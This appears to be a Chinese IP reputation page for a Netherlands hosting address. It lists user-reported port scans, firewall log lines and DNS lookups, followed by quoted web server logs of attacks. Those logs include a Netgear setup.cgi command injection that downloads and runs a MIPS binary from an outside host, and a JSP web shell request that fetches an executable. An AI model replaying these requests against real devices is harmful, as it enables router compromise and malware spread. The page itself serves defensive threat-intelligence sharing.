94.102.49.237 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Netherlands

运营商(isp): Incrediserve Ltd

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Data Center/Web Hosting/Transit

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attack	firewall-block, port(s): 8089/tcp	2019-09-07 13:55:06
attack	09/04/2019-18:07:46.695756 94.102.49.237 Protocol: 6 ET SCAN NMAP -sS window 1024	2019-09-05 06:58:55
attackspambots	Port scan attempt detected by AWS-CCS, CTS, India	2019-09-03 02:50:44
attackbots	08/28/2019-19:53:38.686526 94.102.49.237 Protocol: 6 ET SCAN NMAP -sS window 1024	2019-08-29 09:08:51
attackspambots	Splunk® : port scan detected: Aug 18 18:11:54 testbed kernel: Firewall: TCP_IN Blocked IN=eth0 OUT= MAC=82:c6:52:d1:6e:53:c0:42:d0:39:2c:30:08:00 SRC=94.102.49.237 DST=104.248.11.191 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=10017 PROTO=TCP SPT=58245 DPT=8089 WINDOW=1024 RES=0x00 SYN URGP=0	2019-08-19 06:22:33
attack	Splunk® : port scan detected: Aug 17 22:57:21 testbed kernel: Firewall: TCP_IN Blocked IN=eth0 OUT= MAC=82:c6:52:d1:6e:53:64:c3:d6:0b:ef:f0:08:00 SRC=94.102.49.237 DST=104.248.11.191 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=57138 PROTO=TCP SPT=52228 DPT=8089 WINDOW=1024 RES=0x00 SYN URGP=0	2019-08-18 11:08:05
attackbotsspam	08/17/2019-14:25:13.250304 94.102.49.237 Protocol: 6 ET SCAN NMAP -sS window 1024	2019-08-18 02:35:21
attack	Splunk® : port scan detected: Aug 14 23:30:47 testbed kernel: Firewall: TCP_IN Blocked IN=eth0 OUT= MAC=82:c6:52:d1:6e:53:64:c3:d6:0b:ef:f0:08:00 SRC=94.102.49.237 DST=104.248.11.191 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=55611 PROTO=TCP SPT=57336 DPT=8089 WINDOW=1024 RES=0x00 SYN URGP=0	2019-08-15 12:38:39

相同子网IP讨论:

IP	类型	评论内容	时间
94.102.49.193	botsattackproxy	Bot	2024-04-11 12:03:13
94.102.49.190	proxy	VPN fraud	2023-05-29 12:52:27
94.102.49.191	attackspam	ET DROP Dshield Block Listed Source group 1 - port: 132 proto: tcp cat: Misc Attackbytes: 60	2020-10-14 05:37:55
94.102.49.191	attackspambots	Port-scan: detected 174 distinct ports within a 24-hour window.	2020-10-07 17:07:10
94.102.49.117	attack	massive Port Scan	2020-10-07 04:15:40
94.102.49.59	attack	port scan	2020-10-07 00:57:42
94.102.49.117	attackspambots	massive Port Scan	2020-10-06 20:19:06
94.102.49.59	attack	Hacker	2020-10-06 16:51:13
94.102.49.193	attackbots	TCP (SYN) 94.102.49.193:6707 -> port 502, len 44	2020-10-05 03:01:09
94.102.49.193	attackspambots	TCP (SYN) 94.102.49.193:6707 -> port 502, len 44	2020-10-04 18:45:20
94.102.49.93	attackbotsspam	Port-scan: detected 200 distinct ports within a 24-hour window.	2020-10-04 06:25:39
94.102.49.93	attackbotsspam	Port-scan: detected 200 distinct ports within a 24-hour window.	2020-10-03 22:30:11
94.102.49.93	attackspam	[Sun Sep 27 22:47:43 2020] - Syn Flood From IP: 94.102.49.93 Port: 59653	2020-10-03 14:13:26
94.102.49.137	attackspam	Fri, 2020-10-02 08:33:48 - TCP Packet - Source:94.102.49.137 Destination:xxx.xxx.xxx.xxx - [PORT SCAN]	2020-10-03 04:32:19
94.102.49.137	attack	Oct 2 15:35:22 hidden kernel: [UFW BLOCK] IN=ens192 OUT= MAC=00:50:56:bc:13:b8:30:e4:db:97:3e:3f:08:00 SRC=94.102.49.137 DST=217.198.117.163 LEN=40 TOS=0x00 PREC=0x00 TTL=244 ID=42330 PROTO=TCP SPT=45720 DPT=11117 WINDOW=1024 RES=0x00 SYN URGP=0 Oct 2 15:35:22 hidden kernel: [UFW BLOCK] IN=ens192 OUT= MAC=00:50:56:bc:13:b8:30:e4:db:97:3e:3f:08:00 SRC=94.102.49.137 DST=217.198.117.163 LEN=40 TOS=0x00 PREC=0x00 TTL=244 ID=28079 PROTO=TCP SPT=45720 DPT=11218 WINDOW=1024 RES=0x00 SYN URGP=0 Oct 2 15:35:25 hidden kernel: [UFW BLOCK] IN=ens192 OUT= MAC=00:50:56:bc:13:b8:30:e4:db:97:3e:3f:08:00 SRC=94.102.49.137 DST=217.198.117.163 LEN=40 TOS=0x00 PREC=0x00 TTL=244 ID=3153 PROTO=TCP SPT=45720 DPT=11222 WINDOW=1024 RES=0x00 SYN URGP=0 Oct 2 15:35:25 hidden kernel: [UFW BLOCK] IN=ens192 OUT= MAC=00:50:56:bc:13:b8:30:e4:db:97:3e:3f:08:00 SRC=94.102.49.137 DST=217.198.117.163 LEN=40 TOS=0x00 PREC=0x00 TTL=244 ID=16947 PROTO=TCP SPT=45720 DPT=11215 WINDOW=1024 RES=0x00 SYN URGP=0 Oct 2 15: ...	2020-10-02 23:52:54

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 94.102.49.237
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 31608
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;94.102.49.237.			IN	A

;; AUTHORITY SECTION:
.			1081	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019081401 1800 900 604800 86400

;; Query time: 0 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Thu Aug 15 12:38:29 CST 2019
;; MSG SIZE  rcvd: 117

HOST信息:

237.49.102.94.in-addr.arpa domain name pointer ns1.whiterteethstore.com.

NSLOOKUP信息:

Server:		67.207.67.2
Address:	67.207.67.2#53

Non-authoritative answer:
237.49.102.94.in-addr.arpa	name = ns1.whiterteethstore.com.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
78.101.86.240	attack	78.101.86.240 - - [03/Apr/2019:12:25:10 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://185.22.154.89/bins/September.mips%20-O%20/var/tmp/September.mips;%20chmod%20777%20/var/tmp/September.mips;%20/var/tmp/September.mips;%20rm%20-rf%20/var/tmp/September.mips&curpath=/¤tsetting.htm=1" 400 0 "-" "-"	2019-04-03 12:28:10
40.87.64.218	bots	垃圾暴力破解 40.87.64.218 - - [29/Mar/2019:09:06:53 +0800] "GET /wp-login.php HTTP/1.1" 200 5139 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 40.87.64.218 - - [29/Mar/2019:09:06:53 +0800] "POST /wp-login.php HTTP/1.1" 200 5541 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 40.87.64.218 - - [29/Mar/2019:09:06:53 +0800] "POST /xmlrpc.php HTTP/1.1" 404 3693 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"	2019-03-29 09:10:31
178.154.244.50	bots	yandexbot 178.154.244.50 - - [03/Apr/2019:08:12:31 +0800] "GET /index.php/author/admin/page/3113/ HTTP/1.1" 200 21832 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 178.154.244.50 - - [03/Apr/2019:08:12:33 +0800] "GET /index.php/page/982/ HTTP/1.1" 200 17713 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"	2019-04-03 08:16:17
212.156.221.177	attack	212.156.221.177 - - [02/Apr/2019:12:04:50 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://174.138.11.85/bins/September.mips%20-O%20/var/tmp/September.mips;%20chmod%20777%20/var/tmp/September.mips;%20/var/tmp/September.mips;%20rm%20-rf%20/var/tmp/September.mips&curpath=/¤tsetting.htm=1" 400 0 "-" "-"	2019-04-02 12:05:51
92.240.69.137	spamattack	垃圾IP 92.240.69.137 - - [29/Mar/2019:07:56:34 +0800] "GET /wp-login.php HTTP/1.1" 200 5139 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 92.240.69.137 - - [29/Mar/2019:07:56:34 +0800] "POST /wp-login.php HTTP/1.1" 200 5541 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 92.240.69.137 - - [29/Mar/2019:07:56:34 +0800] "POST /xmlrpc.php HTTP/1.1" 404 3693 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"	2019-03-29 09:14:58
5.188.210.57	spam	wordpress垃圾评论，每天好多 5.188.210.57 - - [28/Mar/2019:17:37:49 +0800] "GET /index.php/page/869/ HTTP/1.0" 200 77511 "https://www.eznewstoday.com/index.php/page/869/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.3 6" 5.188.210.57 - - [28/Mar/2019:17:37:50 +0800] "GET /index.php/2019/02/01/stripe_2019_02_01_en/ HTTP/1.0" 200 41681 "https://www.eznewstoday.com/index.php/2019/02/01/stripe_2019_02_01_en/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML , like Gecko) Chrome/67.0.3396.62 Safari/537.36" 5.188.210.57 - - [28/Mar/2019:17:37:50 +0800] "POST /wp-comments-post.php HTTP/1.0" 302 4146 "https://www.eznewstoday.com/index.php/2019/02/01/stripe_2019_02_01_en/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6 7.0.3396.62 Safari/537.36"	2019-03-28 17:39:26
45.40.194.24	attack	45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMyAdmin1/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMyAdmin123/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /pwd/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMyAdmina/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMydmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMyAdmins/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"	2019-04-03 06:19:58
66.102.6.14	bots	也是谷歌爬虫不是真实流量 66.102.6.14 - - [29/Mar/2019:08:22:44 +0800] "GET / HTTP/1.1" 200 3237 "http://www.google.com/search" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/41.0.2272.118 Safari/537.36"	2019-03-29 09:19:24
157.55.39.74	bots	微软爬虫bingbot 157.55.39.74 - - [02/Apr/2019:14:26:06 +0800] "GET /index.php/2018/09/08/zte_2018_09_08_cn/ HTTP/1.1" 200 14334 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"	2019-04-02 14:27:16
178.154.244.50	bots	俄罗斯的搜索引起爬虫，类似中国百度 178.154.244.50 - - [29/Mar/2019:08:14:24 +0800] "GET /index.php/category/big-shots/duterte/page/11/ HTTP/1.1" 200 18690 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"	2019-03-29 09:14:17
87.106.34.39	attack	87.106.34.39 - - [03/Apr/2019:08:15:20 +0800] "POST /xmlrpc.php HTTP/1.0" 404 468 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"	2019-04-03 08:18:07
220.181.108.90	bots	专爬图片的百度爬虫。。	2019-03-29 13:01:54
58.251.121.184	attack	58.251.121.184 - - [01/Apr/2019:15:40:52 +0800] "GET /super.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.186 - - [01/Apr/2019:15:40:52 +0800] "GET /ww.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"	2019-04-01 15:41:42
118.25.49.95	attack	118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 301 194 "http://118.25.52.138:80/FxCodeShell.jsp%20" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 404 232 "http://118.25.52.138:80/FxCodeShell.jsp%20" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 301 194 "http://118.25.52.138:80/FxCodeShell.jsp::$DATA" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 404 232 "http://118.25.52.138:80/FxCodeShell.jsp::$DATA" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp/ HTTP/1.1" 301 194 "http://118.25.52.138:80/FxCodeShell.jsp/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp/ HTTP/1.1" 404 232 "http://118.25.52.138:80/FxCodeShell.jsp/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe HTTP/1.1" 301 194 "http://118.25.52.138:80/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe HTTP/1.1" 404 232 "http://118.25.52.138:80/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"	2019-04-01 09:39:56
5.188.210.8	spam	垃圾推广IP，wordpress垃圾评论 5.188.210.8 - - [02/Apr/2019:14:12:32 +0800] "GET /index.php/page/869/ HTTP/1.0" 200 100166 "https://www.eznewstoday.com/index.php/page/869/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 " 5.188.210.8 - - [02/Apr/2019:14:12:33 +0800] "GET /index.php/2019/02/06/huawei_2019_02_06_en/ HTTP/1.0" 200 43116 "https://www.eznewstoday.com/index.php/2019/02/06/huawei_2019_02_06_en/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36" 5.188.210.8 - - [02/Apr/2019:14:12:33 +0800] "POST /wp-comments-post.php HTTP/1.0" 302 4146 "https://www.eznewstoday.com/index.php/2019/02/06/huawei_2019_02_06_en/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67. 0.3396.79 Safari/537.36"	2019-04-02 14:24:05

最近上报的IP列表

94.130.178.153	93.82.211.1	189.216.92.36	159.65.187.203
105.225.168.68	177.185.156.11	41.63.0.133	34.251.105.244
95.112.87.7	220.79.20.173	112.84.61.58	14.237.204.34
185.17.128.27	162.144.159.55	218.153.71.49	84.118.160.212
182.50.114.14	138.201.190.35	182.114.130.235	81.45.172.188